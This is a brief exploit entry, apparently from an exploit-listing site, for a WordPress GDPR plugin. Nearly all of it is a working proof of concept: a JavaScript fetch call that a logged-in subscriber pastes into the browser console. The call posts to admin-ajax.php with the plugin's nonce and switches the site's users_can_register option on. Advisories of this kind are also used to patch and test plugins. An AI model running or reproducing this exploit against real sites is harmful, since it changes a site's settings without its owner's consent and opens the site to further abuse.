Share
## https://sploitus.com/exploit?id=WPEX-ID:0C207E0A-F52D-4A59-A7B1-94E4A19B45F6
Run the below command in the developer console of the web browser while being on the blog as subscriber user to set the users_can_register option to true.

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wpgdprc_update_integration&data={"name":"users_can_register","value":true,"type":"yolo"}&security=' + wpgdprcAdmin['ajaxNonce'],
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));